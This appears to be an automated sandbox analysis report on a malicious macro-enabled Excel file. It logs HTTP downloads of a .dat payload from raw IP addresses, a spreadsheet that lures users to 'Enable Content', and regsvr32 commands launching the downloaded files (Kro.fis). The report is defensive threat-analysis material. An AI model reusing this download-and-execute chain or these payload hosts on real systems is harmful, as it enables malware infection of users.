Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Section loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileA |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Process created: C:\Windows\System32\regsvr32.exe |
Source: global traffic |
TCP traffic: 192.168.2.22:49167 -> 190.14.37.3:80 |
Source: global traffic |
TCP traffic: 192.168.2.22:49165 -> 185.240.103.219:80 |
Source: global traffic |
HTTP traffic detected: GET /44372.7671056713.dat HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 190.14.37.3Connection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /44372.7671056713.dat HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 185.183.99.120Connection: Keep-Alive |
Source: unknown |
TCP traffic detected without corresponding DNS query: 185.240.103.219 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 185.240.103.219 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 185.240.103.219 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 185.240.103.219 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 185.240.103.219 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 185.240.103.219 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 190.14.37.3 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 190.14.37.3 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 190.14.37.3 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 190.14.37.3 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 185.183.99.120 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 185.183.99.120 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 185.183.99.120 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 185.183.99.120 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 190.14.37.3 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 185.183.99.120 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 185.183.99.120 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 190.14.37.3 |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\1D80F52D.jpg |
Jump to behavior |
Source: global traffic |
HTTP traffic detected: GET /44372.7671056713.dat HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 190.14.37.3Connection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /44372.7671056713.dat HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 185.183.99.120Connection: Keep-Alive |
Source: regsvr32.exe, 00000003.00000002.2149692188.0000000004880000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2130815410.00000000047B0000.00000002.00000001.sdmp |
String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail) |
Source: regsvr32.exe, 00000003.00000002.2149692188.0000000004880000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2130815410.00000000047B0000.00000002.00000001.sdmp |
String found in binary or memory: http://investor.msn.com |
Source: regsvr32.exe, 00000003.00000002.2149692188.0000000004880000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2130815410.00000000047B0000.00000002.00000001.sdmp |
String found in binary or memory: http://investor.msn.com/ |
Source: regsvr32.exe, 00000003.00000002.2150197240.0000000004A67000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2130963430.0000000004997000.00000002.00000001.sdmp |
String found in binary or memory: http://localizability/practices/XML.asp |
Source: regsvr32.exe, 00000003.00000002.2150197240.0000000004A67000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2130963430.0000000004997000.00000002.00000001.sdmp |
String found in binary or memory: http://localizability/practices/XMLConfiguration.asp |
Source: regsvr32.exe, 00000003.00000002.2146852536.0000000003950000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2127425533.00000000039A0000.00000002.00000001.sdmp |
String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous. |
Source: regsvr32.exe, 00000003.00000002.2146134146.0000000001C50000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2126766598.0000000001C20000.00000002.00000001.sdmp, regsvr32.exe, 00000005.00000002.2107504006.0000000001DB0000.00000002.00000001.sdmp |
String found in binary or memory: http://servername/isapibackend.dll |
Source: regsvr32.exe, 00000003.00000002.2150197240.0000000004A67000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2130963430.0000000004997000.00000002.00000001.sdmp |
String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check |
Source: regsvr32.exe, 00000003.00000002.2150197240.0000000004A67000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2130963430.0000000004997000.00000002.00000001.sdmp |
String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true |
Source: regsvr32.exe, 00000003.00000002.2146852536.0000000003950000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2127425533.00000000039A0000.00000002.00000001.sdmp, regsvr32.exe, 00000005.00000002.2108101564.0000000003990000.00000002.00000001.sdmp |
String found in binary or memory: http://www.%s.comPA |
Source: regsvr32.exe, 00000003.00000002.2149692188.0000000004880000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2130815410.00000000047B0000.00000002.00000001.sdmp |
String found in binary or memory: http://www.hotmail.com/oe |
Source: regsvr32.exe, 00000003.00000002.2150197240.0000000004A67000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2130963430.0000000004997000.00000002.00000001.sdmp |
String found in binary or memory: http://www.icra.org/vocabulary/. |
Source: regsvr32.exe, 00000003.00000002.2149692188.0000000004880000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2130815410.00000000047B0000.00000002.00000001.sdmp |
String found in binary or memory: http://www.msnbc.com/news/ticker.txt |
Source: regsvr32.exe, 00000004.00000002.2130815410.00000000047B0000.00000002.00000001.sdmp |
String found in binary or memory: http://www.windows.com/pctv. |
Source: Screenshot number: 4 |
Screenshot OCR: Enable Editing from the ' yellow bar above. 21 22 G) PROTECTED VIEW Be careful-files from the In |
Source: Screenshot number: 4 |
Screenshot OCR: Enable Content 30 31 32 33 34 35 36 37 38 , Id 1 p pi Sheetl i q |1|| P A EC DO I '0 |
Source: Screenshot number: 8 |
Screenshot OCR: Enable Editing from the ' yellow bar above. 21 :: G) PROTECTED VIEW Be careful-files from the In |
Source: Screenshot number: 8 |
Screenshot OCR: Enable Content 30 31 32 33 34 35 36 37 38 , Id 1 p pi Sheetl i q |1|| P A 'g ,,J |
Source: Document image extraction number: 0 |
Screenshot OCR: Enable Editing from the yellow bar above. PROTECTED VIEW Be careful-files from the Internet can |
Source: Document image extraction number: 0 |
Screenshot OCR: Enable Content |
Source: Document image extraction number: 1 |
Screenshot OCR: Enable Editing from the yellow bar above. (i) PROTECTED VIEW Be careful-files from the Internet ca |
Source: Document image extraction number: 1 |
Screenshot OCR: Enable Content |
Source: Permission-1532161794-06252021.xlsm |
Initial sample: EXEC |
Source: regsvr32.exe, 00000003.00000002.2149692188.0000000004880000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2130815410.00000000047B0000.00000002.00000001.sdmp |
Binary or memory string: .VBPud<_ |
Source: classification engine |
Classification label: mal64.expl.evad.winXLSM@7/7@0/3 |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File created: C:\Users\user\Desktop\~$Permission-1532161794-06252021.xlsm |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File created: C:\Users\user\AppData\Local\Temp\CVRC503.tmp |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File read: C:\Users\desktop.ini |
Jump to behavior |
Source: C:\Windows\System32\regsvr32.exe |
Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers |
Jump to behavior |
Source: unknown |
Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding |
|
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Process created: C:\Windows\System32\regsvr32.exe regsvr32 ..\Kro.fis |
|
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Process created: C:\Windows\System32\regsvr32.exe regsvr32 ..\Kro.fis1 |
|
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Process created: C:\Windows\System32\regsvr32.exe regsvr32 ..\Kro.fis2 |
|
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Process created: C:\Windows\System32\regsvr32.exe regsvr32 ..\Kro.fis |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Process created: C:\Windows\System32\regsvr32.exe regsvr32 ..\Kro.fis1 |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Process created: C:\Windows\System32\regsvr32.exe regsvr32 ..\Kro.fis2 |
Jump to behavior |
Source: Window Recorder |
Window detected: More than 3 window changes detected |
Source: Permission-1532161794-06252021.xlsm |
Initial sample: OLE zip file path = xl/media/image1.jpg |
Source: Permission-1532161794-06252021.xlsm |
Initial sample: OLE zip file path = xl/worksheets/_rels/sheet2.xml.rels |
Source: Permission-1532161794-06252021.xlsm |
Initial sample: OLE zip file path = xl/calcChain.xml |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\regsvr32.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\regsvr32.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\regsvr32.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\regsvr32.exe TID: 2944 |
Thread sleep time: -60000s >= -30000s |
Jump to behavior |
Source: C:\Windows\System32\regsvr32.exe TID: 2384 |
Thread sleep time: -60000s >= -30000s |
Jump to behavior |
Source: C:\Windows\System32\regsvr32.exe TID: 2452 |
Thread sleep time: -60000s >= -30000s |
Jump to behavior |